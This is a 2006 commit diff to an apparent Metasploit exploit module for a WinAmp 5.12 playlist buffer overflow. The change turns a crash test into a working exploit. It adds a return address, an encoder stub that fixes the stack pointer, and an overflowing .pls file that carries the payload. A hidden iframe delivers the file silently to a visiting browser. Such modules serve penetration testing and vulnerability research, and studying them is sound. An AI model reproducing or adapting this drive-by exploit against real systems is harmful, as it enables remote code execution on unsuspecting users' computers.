Woo, neat krad winamp exploit :)

git-svn-id: file:///home/svn/incoming/trunk@3479 4d416f70-5f16-0410-b530-b9f4589650da
2006-01-30 19:28:19 +00:00 · 2006-01-30 19:28:19 +00:00 · 7ee4d05bec
parent cd06c10aba
commit 7ee4d05bec
1 changed files with 21 additions and 7 deletions
--- a/modules/exploits/windows/browser/winamp_playlist_unc.rb
+++ b/modules/exploits/windows/browser/winamp_playlist_unc.rb
@ -26,7 +26,7 @@ class Exploits::Windows::Browser::WinAmp_Playlist_UNC < Msf::Exploit::Remote
 				],
 			'DefaultOptions' =>
 				{
-					'EXITFUNC' => 'thread',
+					'EXITFUNC' => 'process',
 				},
 			'Payload'        =>
 				{
@ -36,11 +36,19 @@ class Exploits::Windows::Browser::WinAmp_Playlist_UNC < Msf::Exploit::Remote
 						{
 							'ConnectionType' => '-find',
 						},
+					
+					# Landing on \x5c\x5c trashes esp, restore from ecx
+					'PrependEncoder' => "\x87\xe1",
+					
+					# Dont need them, dont want them, preserve esi
+					'DisableNops' => true,
+					
 				},
 			'Platform'       => 'win',
 			'Targets'        =>
 				[
-					[ 'WinAmp 5.12', { }],
+					# Return to exe, but don't clobber ecx, 0x0d is replaced by 0x00
+					[ 'WinAmp 5.12', { 'Ret' => 0x0d45fece }],
 				],
 			'DisclosureDate' => 'Jan 29 2006',
 			'DefaultTarget'  => 0))
@ -54,10 +62,12 @@ class Exploits::Windows::Browser::WinAmp_Playlist_UNC < Msf::Exploit::Remote
 	
 		if (not request.uri.match(/\.pls$/i))
 			html =
-				"<html><iframe src='" + get_resource + '/' +
+				"<html><body>"+
+				"<iframe style='position:absolute;visibility:hidden;' " +
+				"src='" + get_resource + '/' +
 				Rex::Text.rand_text_alphanumeric(rand(80)+16) + 
 				".pls'></iframe>" +
-				"<body>One second please...</body></html>"
+				"One second please...</body></html>"
 			send_response(cli, html)
 			return
 		end
@ -73,11 +83,15 @@ class Exploits::Windows::Browser::WinAmp_Playlist_UNC < Msf::Exploit::Remote
 	
 	def generate_playlist(payload)

-		file = Rex::Text.pattern_create(2048)
+		name = "The Metasploit(TM) Theme Song"
+		file = Rex::Text.rand_text_english(1026)
+		file[1022  , 4] = [target.ret].pack('V')
+		file[0, payload.encoded.length] = payload.encoded
+		 
 		play =
 			"[playlist]\r\n"                 +
-				"File1=\\\\" + file + "\r\n" +
-				"Title1=~BOF~\r\n"           +
+				"File1=\\\\#{file}\r\n"      +
+				"Title1=#{name}\r\n"         +
 				"Length1=FFF\r\n"            + 
 				"NumberOfEntries=1\r\n"      + 
 				"Version=2\r\n"